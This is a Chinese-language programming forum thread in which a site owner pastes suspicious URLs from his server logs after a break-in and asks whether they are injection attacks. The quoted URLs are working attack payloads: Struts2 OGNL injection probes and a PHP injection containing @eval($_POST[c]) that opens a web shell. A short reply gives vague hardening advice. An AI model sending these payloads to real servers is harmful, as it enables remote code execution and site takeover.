台灣最大程式設計社群網站
線上人數
1566
 
會員總數:244789
討論主題:188837
歡迎您免費加入會員
討論區列表 >> PHP >> 注入攻擊?
[]  
[我要回覆]
1
回應主題 加入我的關注話題 檢舉此篇討論 將提問者加入個人黑名單
注入攻擊?
價值 : 50 QP  點閱數:694 回應數:1

樓主

迷路
高級專家
10236 134
6965 1698
發送站內信

捐贈 VP 給 迷路
今天又發現網站被攻擊
檢查一下上傳元件跟PHPMailer該打補丁的部分都打過了
之後看了一下記錄檔,這次似乎是從後台進入上傳的
再看了一下發現幾條詭異的網址記錄
http://www.xxx.com.tw/?redirect:$%7B%23matt%3d%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.setContentType('text/plain'),%23matt.getWriter().println%20('successsuccess'),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D

http://www.xxx.com.tw/eypage.html?redirect:$%7B%23matt%3d%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.setContentType('text/plain'),%23matt.getWriter().println%20('successsuccess'),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D

/admin.php/module/action/param1/$%7B@eval($_POST%5Bc%5D)%7D

看起來像是注入攻擊,可是看不懂不知道該怎麼擋
請教各位大大,這是不是攻擊的語法,如果是該怎麼擋?

搜尋相關Tags的文章: [ 注入攻擊 ] ,
本篇文章發表於2017-07-25 11:27
別忘捐VP感謝幫助你的人 新手會員瞧一瞧
1樓
最有價值解答

浩瀚星空
捐贈 VP 給 浩瀚星空 檢舉此回應
你還有我的電話吧。有空打給我,我再跟你說明這個情況。
其實倒也不用擔心。只要你的web server使用的帳號只有基本網路的權限就行了。

這是利用某些server的漏洞。可以強制取得運行命令的畫面。它這邊的寫法看起來會利用你的mail伺服。將收集的資料發送或是列印出來。

感覺你還是有很多上傳的機制沒補好。
本篇文章回覆於2017-08-03 16:03
== 簽名檔 ==
--未登入的會員無法查看對方簽名檔--
   
1

回覆
如要回應,請先登入.